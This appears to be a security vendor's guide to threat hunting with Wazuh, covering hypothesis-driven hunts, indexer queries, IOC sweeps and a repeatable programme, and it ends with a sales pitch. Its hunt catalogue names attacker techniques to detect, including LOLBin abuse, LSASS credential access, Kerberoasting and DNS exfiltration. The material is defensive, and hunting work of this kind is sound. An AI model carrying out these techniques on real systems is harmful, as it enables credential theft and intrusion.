Wazuh Threat Hunting Techniques

What Threat Hunting Is and Is Not

Threat hunting is the proactive, hypothesis-driven search for adversaries that have evaded existing detections. It assumes that prevention and alerting are imperfect and that a sufficiently capable attacker may already be present, leaving traces that no rule happened to flag. The hunter's job is to find those traces before they become an incident. This is fundamentally different from alert triage, which is reactive and works the queue that detection rules produce.

It is also not the same as running a vulnerability scan or a compliance audit. Hunting looks for evidence of adversary activity in real telemetry, not for weaknesses or policy gaps. And it is not random log browsing: effective hunting is structured around a hypothesis, which keeps the search focused and the results meaningful. A hunt without a hypothesis tends to wander and rarely concludes.

Wazuh is well suited to hunting because the indexer holds searchable historical telemetry across endpoints, network, cloud and identity, and because rules and ATT&CK mappings give hunters a framework. The same platform that detects also lets you hunt and then convert hunt findings into new detections, closing the loop between proactive and reactive defence.

Hypothesis-Driven Hunting

The backbone of mature hunting is the hypothesis. A hypothesis is a specific, testable statement about how an adversary might be operating in your environment, usually derived from an ATT&CK technique, a piece of threat intelligence, or knowledge of your own attack surface. For example: an attacker who has gained a foothold would establish persistence through a new scheduled task or service. That hypothesis predicts specific evidence (scheduled-task or service-creation events) that you can then search for.

The method runs in four steps. Form the hypothesis from ATT&CK or intel. Predict the evidence the behaviour would leave in your telemetry: which log source, which event, what would distinguish malicious from benign. Search the data in the Wazuh indexer for that evidence, filtering aggressively to separate signal from routine activity. Conclude: either you find suspicious activity and pivot into investigation and response, or you find only benign activity and you document the hunt and convert it into a detection rule.

Good hypotheses are specific enough to be testable and tied to behaviours that would actually matter. Anchoring hunts to the MITRE ATT&CK techniques most relevant to your threat model (the tactics a realistic adversary against your sector would use) keeps the programme focused and lets you track hunting coverage against the same ATT&CK matrix you use for detection.

Hunting with Wazuh Search Queries

The practical work of hunting happens in the Wazuh dashboard's search and discovery interface over the indexer. Hunters query normalised fields (the decoded data, rule IDs, ATT&CK tags, user, host, process, source and destination) to slice the telemetry. Effective hunting queries combine filters to isolate the rare and suspicious: a particular process name with an unusual parent, connections to a specific port from hosts that should not make them, or authentication events filtered to off-hours and sensitive systems.

Several query patterns recur across hunts. Stacking and aggregation groups events by a field (process name, destination IP, user) and sorts by frequency, surfacing the rare outliers that hunting targets, since attacker tooling is usually uncommon in a population of normal activity. Pivoting follows a thread: from a suspicious process to its network connections to the user who launched it to that user's other activity. Time-bounding focuses a hunt on a window of interest, such as around a known event or a suspected compromise date.

Process-tree reconstruction is a high-value technique on endpoints. With Sysmon and auditd data, a hunter can rebuild the full parent-child chain of a suspicious process, revealing how it was launched and what it spawned, which is often where living-off-the-land attacks reveal themselves (for example a document handler spawning a script interpreter spawning a network tool). These chains rarely match a single signature but are clear to a hunter who knows what normal looks like.

IOC Sweeps and Threat Intelligence Hunting

Intelligence-driven hunting starts from indicators of compromise rather than behaviour. When new threat intelligence arrives (a fresh set of malicious IPs, domains, file hashes or TTPs tied to a campaign), the hunter sweeps historical telemetry to determine whether those indicators have ever appeared in the environment. This retroactive search is one of the highest-value hunts because it can reveal a past or ongoing compromise that detection missed at the time the indicator was unknown.

In the Codesecure stack, MISP aggregates threat-intel feeds and Wazuh checks incoming events against current indicators automatically, but the historical sweep is where hunting adds value. A hunter takes a new indicator set and queries the full retained history in the indexer (which, because Wazuh has no per-GB licensing, can span months) for any match: a DNS lookup of a malicious domain, a connection to a known-bad IP, a file hash recorded by file integrity monitoring. A hit triggers immediate investigation.

IOC sweeps should be systematic, not ad hoc. Maintaining a process where significant new intelligence automatically prompts a retrospective sweep ensures that the moment an indicator becomes known, your historical exposure to it is assessed. Cortex analyzers enrich any hit (reputation, related infrastructure, campaign attribution) so the hunter can quickly judge severity and scope.

Practical Hunt Techniques to Run

These hunts are concrete, repeatable and map to common adversary behaviour. They make a good starting catalogue for a Wazuh hunting programme.

• Persistence hunt: review new scheduled tasks, services, run keys and startup entries for anything unexpected or recently created.
• Living-off-the-land hunt: stack usage of LOLBins (PowerShell, certutil, rundll32, wmic) and inspect unusual command lines and parent processes.
• Lateral movement hunt: look for remote service creation, anomalous SMB or RDP patterns, and new admin logins across multiple hosts.
• Beaconing hunt: aggregate outbound connections by destination and look for regular, fixed-interval traffic indicating command and control.
• Credential access hunt: search for LSASS access, suspicious authentication patterns and Kerberoasting indicators.
• Rare-process hunt: stack process names across the fleet and investigate the least common executables, where novel tooling hides.
• DNS hunt: surface rare or newly-seen domains, long random-looking domain names and high-volume lookups suggesting tunnelling or exfiltration.

Building a Repeatable Hunting Programme

Threat hunting delivers the most value when it is a disciplined, recurring programme rather than an occasional heroic effort. A practical cadence assigns regular hunting time, draws hypotheses from a backlog tied to ATT&CK and current threat intelligence, documents each hunt (the hypothesis, the data examined, the queries, the conclusion) and tracks ATT&CK coverage so the programme demonstrably broadens over time. The documentation matters: a hunt that found nothing still has value as evidence and as a candidate for automation.

The single most important discipline is closing the loop. Every hunt that finds a detectable technique should produce a new Wazuh rule so the technique is caught automatically from then on. This is how a hunting programme compounds: each hunt either finds a threat or permanently widens automated coverage, so the reactive detection layer keeps getting stronger from proactive effort. Over time the hunters spend less effort on techniques that are now automated and more on genuinely novel hypotheses.

Codesecure runs threat hunting as part of its managed SOC and as standalone engagements: structured hypothesis-driven hunts mapped to ATT&CK, systematic IOC sweeps against retained history, full documentation, and conversion of findings into durable detections in your Wazuh deployment. For teams hunting in-house, we deliver the methodology, query playbooks and a starter hunt catalogue with handover. ISO/IEC 27001:2022 certified delivery with named OSCP and CEH consultants.